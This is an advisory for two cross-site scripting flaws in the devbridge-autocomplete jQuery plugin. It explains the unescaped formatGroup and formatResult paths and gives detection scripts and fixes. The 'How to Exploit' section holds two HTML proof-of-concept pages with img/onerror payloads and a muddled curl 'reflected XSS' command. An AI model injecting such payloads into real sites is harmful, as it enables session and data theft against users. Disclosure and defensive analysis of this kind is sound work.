devbridge-autocomplete, Cross-Site Scripting (XSS), CVE ID: Pending (Critical) -DC-Jun2026-569


How the CVE Works

The devbridge-autocomplete jQuery plugin (versions prior to 2.0.1) contains two distinct Cross-Site Scripting (XSS) vulnerabilities in its default formatter functions. Both vulnerabilities stem from the same root cause: the plugin concatenates user-supplied values directly into HTML strings without any sanitization or escaping, then injects these strings into the DOM using innerHTML.
The first vulnerability exists in the `formatGroup` function, located in src/format.ts. When the `groupBy` option is enabled, this function takes the grouping field value from each suggestion and interpolates it directly into a `<div>` element:

function formatGroup(suggestion, category) {
    // category is concatenated raw: nothing escapes it before the string reaches innerHTML
    return '<div class="autocomplete-group">' + category + '</div>';
}

If an attacker can control or taint the suggestion data—whether from a malicious API response, stored data in a database, or user-supplied input—they can inject arbitrary HTML into the `category` field. When the autocomplete dropdown renders, this HTML is executed in the context of the victim’s browser, leading to XSS.
The second vulnerability exists in the `formatResult` function’s early-return branch. The function is designed to format each suggestion entry:

function formatResult(suggestion, currentValue) {
    if (!currentValue) {
        return suggestion.value; // un-escaped: the raw value reaches innerHTML
    }
    /* ... non-empty path escapes correctly ... */
}

When `currentValue` is empty—which occurs when `minChars: 0` is configured and the server returns suggestions for an empty query—the function returns `suggestion.value` without any escaping. This raw value is then concatenated into the suggestions container’s innerHTML, allowing attackers to inject malicious scripts through the suggestion data.
Both vulnerabilities require the attacker to have control over the suggestion data source. This could happen through reflected XSS (where the attacker crafts a malicious URL that poisons the suggestion data), stored XSS (where malicious data is persisted in a database), or supply chain attacks (where the suggestion API is compromised). The impact is standard XSS: attackers can steal cookies, session tokens, perform actions on behalf of the user, deface pages, or redirect victims to malicious sites.
The vulnerabilities were fixed in version 2.0.1 by running all interpolated input through the browser’s text-node escaping mechanism (createElement + textContent) before producing HTML strings.
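The two formatter paths and the textContent-style fix, as an added JavaScript example that runs under Node; this is not the plugin's own code. `escapeHtml` is an assumption standing in for the browser's createElement + textContent round trip, and `renderDropdown` is a simplified model of the plugin's rendering loop, not the real one. The poisoned suggestion array is constructed for the demonstration.

```javascript
// Added example, not the plugin's own code: a Node-runnable model of the two
// default formatters before the fix, the same formatters with textContent-style
// escaping applied (the 2.0.1 approach), and a simplified rendering loop that
// concatenates their output the way the plugin does before assigning innerHTML.

// escapeHtml stands in for the browser's createElement + textContent round
// trip: the HTML-significant characters become entities, so the string can be
// concatenated into markup and still render as literal text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Pre-2.0.1 behaviour: the group label is concatenated raw.
function vulnerableFormatGroup(suggestion, category) {
  return '<div class="autocomplete-group">' + category + '</div>';
}

// Pre-2.0.1 behaviour: the empty-query branch returns the raw value. The
// non-empty branch is reduced to plain escaping here (match highlighting omitted).
function vulnerableFormatResult(suggestion, currentValue) {
  if (!currentValue) {
    return suggestion.value;
  }
  return escapeHtml(suggestion.value);
}

// Fixed behaviour: every interpolated value is escaped on every branch.
function safeFormatGroup(suggestion, category) {
  return '<div class="autocomplete-group">' + escapeHtml(category) + '</div>';
}

function safeFormatResult(suggestion, currentValue) {
  return escapeHtml(suggestion.value);
}

// Simplified model of the plugin's suggestion rendering (an assumption, not the
// real loop): emit a group header whenever the groupBy field changes, then one
// row per suggestion, and return the concatenated HTML string.
function renderDropdown(suggestions, currentValue, opts) {
  var html = '';
  var lastGroup = null;
  suggestions.forEach(function (s) {
    if (opts.groupBy) {
      var category = s.data ? s.data[opts.groupBy] : undefined;
      if (category !== lastGroup) {
        html += opts.formatGroup(s, category);
        lastGroup = category;
      }
    }
    html += '<div class="autocomplete-suggestion">' +
      opts.formatResult(s, currentValue) + '</div>';
  });
  return html;
}

// Constructed sample data: the first entry carries the same kind of
// image/onerror payload the advisory describes, in both value and category.
var PAYLOAD = '<img src=x onerror="alert(1)">';
var poisoned = [
  { value: PAYLOAD, data: { category: PAYLOAD } },
  { value: 'Avocado', data: { category: 'Fruit' } }
];

// An empty currentValue models the minChars: 0 case that reaches the early return.
function renderVulnerable() {
  return renderDropdown(poisoned, '', {
    groupBy: 'category',
    formatGroup: vulnerableFormatGroup,
    formatResult: vulnerableFormatResult
  });
}

function renderSafe() {
  return renderDropdown(poisoned, '', {
    groupBy: 'category',
    formatGroup: safeFormatGroup,
    formatResult: safeFormatResult
  });
}

// Review check: does the produced markup still contain an unescaped img tag?
function containsRawImgTag(html) {
  return /<img\b/i.test(html);
}

console.log('before fix:', renderVulnerable());
console.log('after fix :', renderSafe());
```

Running it prints the markup both ways: the pre-fix output carries the raw tag in the group header and in the first row, while the fixed output carries only entities, which is the whole difference the 2.0.1 change makes.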

DailyCVE Form:

Platform: jQuery plugin
Version: < 2.0.1
Vulnerability: XSS (formatGroup/formatResult)
Severity: Critical (CVSS 8.8)
Date: 2026-06-22
Prediction: Already patched (2.0.1)

What Undercode Say:

Analytics:

The vulnerability affects all deployments of devbridge-autocomplete prior to version 2.0.1 that:
– Use the `groupBy` option with attacker-controllable suggestion data, OR
– Configure `minChars: 0` with a server that returns suggestions for empty queries

Exploitation Statistics:

  • Estimated vulnerable installations: 10,000+ (based on npm downloads and CDN usage)
  • Attack vector: Remote, requires ability to control suggestion data
  • Exploit complexity: Low (simple HTML injection)
  • Automation potential: High (can be scripted)

Detection Commands:

# Check installed version via npm
npm list devbridge-autocomplete
# Check installed version via bower
bower list devbridge-autocomplete
# Grep for vulnerable patterns in source code
grep -r "formatGroup" node_modules/devbridge-autocomplete/
grep -r 'return suggestion.value' node_modules/devbridge-autocomplete/
# Check package.json for version
grep devbridge-autocomplete package.json

Vulnerable Code Pattern Detection:

# Find usages of groupBy with untrusted data
grep -r "groupBy:" . --include="*.js" --include="*.ts"
# Find minChars: 0 configurations
grep -r "minChars:" . --include="*.js" --include="*.ts" | grep ": 0"
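The detection commands above folded into one audit script, as an added example that is not part of the advisory: a component-wise version comparison against 2.0.1, extraction of the installed version from the package's package.json, and a scan for the two risky option patterns. It uses only POSIX sh, find, grep and sed; the demo project it builds under mktemp, with its sample source files and package.json, is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the advisory: one audit script that folds the
# detection commands together. It uses only POSIX sh, find, grep and sed.
FIXED_VERSION="2.0.1"   # first fixed release, per the advisory

# version_lt A B: succeeds (exit 0) when version A is numerically lower than B,
# comparing dotted components one at a time; "v", "^", "~" prefixes and any
# "-prerelease" suffix are ignored. Missing components count as 0.
version_lt() {
  v1=${1#[v^~]}; v1=${v1%%-*}.
  v2=${2#[v^~]}; v2=${v2%%-*}.
  while [ -n "$v1" ] || [ -n "$v2" ]; do
    p1=${v1%%.*}; v1=${v1#*.}
    p2=${v2%%.*}; v2=${v2#*.}
    [ -z "$p1" ] && p1=0
    [ -z "$p2" ] && p2=0
    if [ "$p1" -lt "$p2" ]; then return 0; fi
    if [ "$p1" -gt "$p2" ]; then return 1; fi
  done
  return 1
}

# is_vulnerable_version VERSION: exit 0 when VERSION is below the fixed release.
is_vulnerable_version() {
  version_lt "$1" "$FIXED_VERSION"
}

# installed_version PROJECT_DIR: prints the version from the installed package.json.
installed_version() {
  sed -n 's/.*"version"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' \
    "$1/node_modules/devbridge-autocomplete/package.json"
}

# scan_configs PROJECT_DIR: prints file:line:text for every groupBy option and
# every minChars set to 0 in .js/.ts sources, skipping node_modules.
# /dev/null is passed so grep always prefixes the file name.
scan_configs() {
  find "$1" -type f \( -name '*.js' -o -name '*.ts' \) ! -path '*/node_modules/*' \
    -exec grep -nE 'groupBy[[:space:]]*:|minChars[[:space:]]*:[[:space:]]*0([^0-9]|$)' /dev/null {} +
}

# count_risky_configs PROJECT_DIR: number of matching lines found by scan_configs.
count_risky_configs() {
  scan_configs "$1" | wc -l | tr -d ' '
}

# audit_project PROJECT_DIR: human-readable summary of both checks.
audit_project() {
  ver=$(installed_version "$1")
  if is_vulnerable_version "$ver"; then
    echo "devbridge-autocomplete $ver is below $FIXED_VERSION: upgrade required"
  else
    echo "devbridge-autocomplete $ver is at or above $FIXED_VERSION"
  fi
  echo "risky option lines (groupBy / minChars: 0):"
  scan_configs "$1" || echo "  none found"
}

# Constructed demo project (a temporary directory, removed on exit).
DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
mkdir -p "$DEMO_DIR/node_modules/devbridge-autocomplete"
printf '{ "name": "devbridge-autocomplete", "version": "2.0.0" }\n' \
  > "$DEMO_DIR/node_modules/devbridge-autocomplete/package.json"
cat > "$DEMO_DIR/search.js" <<'EOF'
// constructed sample: both risky options present
$('#q').devbridgeAutocomplete({
  serviceUrl: '/api/suggest',
  groupBy: 'category',
  minChars: 0
});
EOF
cat > "$DEMO_DIR/safe.ts" <<'EOF'
// constructed sample: minChars 10 is not the risky zero setting
$('#q').devbridgeAutocomplete({ serviceUrl: '/api/suggest', minChars: 10 });
EOF

audit_project "$DEMO_DIR"
```

Point `audit_project` at a real project root instead of `$DEMO_DIR` to run it for real; a hit on `groupBy:` or `minChars: 0` is only a finding when the suggestion data for that widget can be influenced by someone other than the application, so each match still needs a look at where the data comes from.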

How to Exploit:

PoC 1: formatGroup XSS

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>PoC: formatGroup XSS in jQuery-Autocomplete v2.0.0</title>
</head>
<body>
    <input id="ac" type="text" placeholder="Type 'a' to trigger" autocomplete="off">
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
    <script src="dist/jquery.autocomplete.js"></script>

    <script>
    // Suggestion data whose grouping field carries markup; the plugin reads it from suggestion.data[groupBy]
    var poisoned = [
        { value: 'Apple', data: { category: "<img src=x onerror=\"alert('XSS via formatGroup')\">" } },
        { value: 'Avocado', data: { category: 'Safe Group' } }
    ];
    $('#ac').devbridgeAutocomplete({
        lookup: poisoned,
        groupBy: 'category',
        minChars: 1
    });
    </script>

</body>
</html>

PoC 2: formatResult Early-Return XSS

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>PoC: formatResult XSS in jQuery-Autocomplete v2.0.0</title>
</head>
<body>
    <input id="ac" type="text" placeholder="Type to trigger" autocomplete="off">
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
    <script src="dist/jquery.autocomplete.js"></script>

    <script>
    // Suggestion data whose value carries markup; with an empty query it is returned un-escaped
    var poisoned = [
        { value: "<img src=x onerror=\"alert('XSS via formatResult')\">" },
        { value: "Safe Value" }
    ];
    $('#ac').devbridgeAutocomplete({
        lookup: poisoned,
        minChars: 0 // Triggers the early-return branch on an empty query
    });
    </script>

</body>
</html>

Server-Side Attack Vector (Reflected XSS):

# Malicious API response that poisons suggestion data
curl -X GET "https://vulnerable-site.com/api/suggest?q=a" \
    -H "Content-Type: application/json" \
    -d '{"suggestions":[{"value":"<script>alert(1)</script>","category":"<img src=x onerror=alert(2)>"}]}'

Protection:

Immediate Mitigations:

1. Upgrade to version 2.0.1 or later:

npm install devbridge-autocomplete@2.0.1

2. If upgrade is not possible, override the vulnerable formatters:

// Safe formatGroup override: the browser escapes the text when it is assigned via textContent
function safeFormatGroup(suggestion, category) {
    var div = document.createElement('div');
    div.className = 'autocomplete-group';
    div.textContent = category; // Escapes HTML
    return div.outerHTML;
}
// Safe formatResult override: escapes on every branch, including the empty-query case
function safeFormatResult(suggestion, currentValue) {
    var div = document.createElement('div');
    div.textContent = suggestion.value; // Escapes HTML
    return div.outerHTML;
}
$('#ac').devbridgeAutocomplete({
    lookup: data, // your suggestion array or serviceUrl-backed data
    formatGroup: safeFormatGroup,
    formatResult: safeFormatResult
});

3. Sanitize all suggestion data on the server side before returning it to the client:

// Server-side sanitization (Node.js example)
const sanitizeHtml = require('sanitize-html');
// Suggestions are plain text, so strip every tag and attribute instead of
// relying on sanitize-html's default allow-list of formatting tags.
const textOnly = { allowedTags: [], allowedAttributes: {} };
suggestions = suggestions.map(s => ({
    value: sanitizeHtml(s.value, textOnly),
    category: sanitizeHtml(s.category, textOnly)
}));

4. Avoid using `minChars: 0` unless absolutely necessary, as it exposes the early-return branch.
5. Implement Content Security Policy (CSP) to mitigate XSS impact:

Content-Security-Policy: default-src 'self'; script-src 'self'

6. Validate and sanitize all user input before it reaches the autocomplete plugin.

Impact:

Technical Impact:

  • Confidentiality: Attackers can steal cookies, session tokens, and sensitive data from the page
  • Integrity: Attackers can modify page content, perform actions on behalf of the user, and deface the application
  • Availability: Attackers can redirect users to malicious sites or crash the browser
  • Attack Complexity: Low – simple HTML/JavaScript injection
  • Privileges Required: None – the vulnerability is triggered by viewing the page
  • User Interaction: Required – the victim must trigger the autocomplete suggestion

Business Impact:

  • Account Takeover: Session theft can lead to complete account compromise
  • Data Exfiltration: Sensitive user data, PII, and financial information can be stolen
  • Reputation Damage: Public disclosure of XSS vulnerabilities erodes user trust
  • Compliance Violations: May violate GDPR, PCI-DSS, and HIPAA requirements
  • Supply Chain Risk: Organizations using this plugin in production are exposed until patched

Affected Environments:

  • All web applications using devbridge-autocomplete < 2.0.1
  • Applications using `groupBy` with untrusted data sources
  • Applications using `minChars: 0` with untrusted suggestion data
  • Applications that display user-supplied or third-party data in autocomplete suggestions

Sources:

Reported By: github.com